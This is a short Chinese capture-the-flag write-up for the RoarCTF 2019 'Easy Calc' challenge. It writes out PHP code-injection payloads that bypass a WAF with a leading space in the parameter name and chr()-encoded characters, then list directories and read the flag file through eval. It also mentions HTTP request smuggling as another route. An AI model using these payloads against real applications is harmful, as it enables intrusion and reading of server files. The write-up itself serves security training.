web第16题
[RoarCTF 2019]Easy Calc
打开靶场:
查看源代码,发现有一个calc.php文件,并且提示设置了waf
先尝试访问calc.php
得到源码,使用get方式传参赋值给num,并且使用正则表达式进行了过滤,只要能绕过过滤,就可以通过eval进行任意php语句
首先尝试直接?num=phpinfo()
禁止访问,应该是waf起了作用,根据大佬们的wp知道可以通过在num前加一个空格进行绕过
原理:php解析规则:当php进行解析时,如果变量名前面有空格,php会自动去掉前面的空格再进行解析,假如waf不允许num变量接收字母,那么使用 num就可以,而php解析时就会自动把空格去掉
尝试? num=phpinfo()
成功绕过,先使用scandir查看目录中的内容,找到存有flag的文件
? num=scandir("/")
忘了/被过滤了,尝试绕过。使用chr对/的ascii码进行转换绕过,只有这个才不需要引号
? num=var_dump(scandir(chr(47)))
得到f1agg文件
尝试对该文件进行读取
? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
得到flag
还有一种解题方法,http走私,参考大佬的博客
[RoarCTF 2019]Easy Calc(http走私 && 利用PHP的字符串解析特性Bypass)
163
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
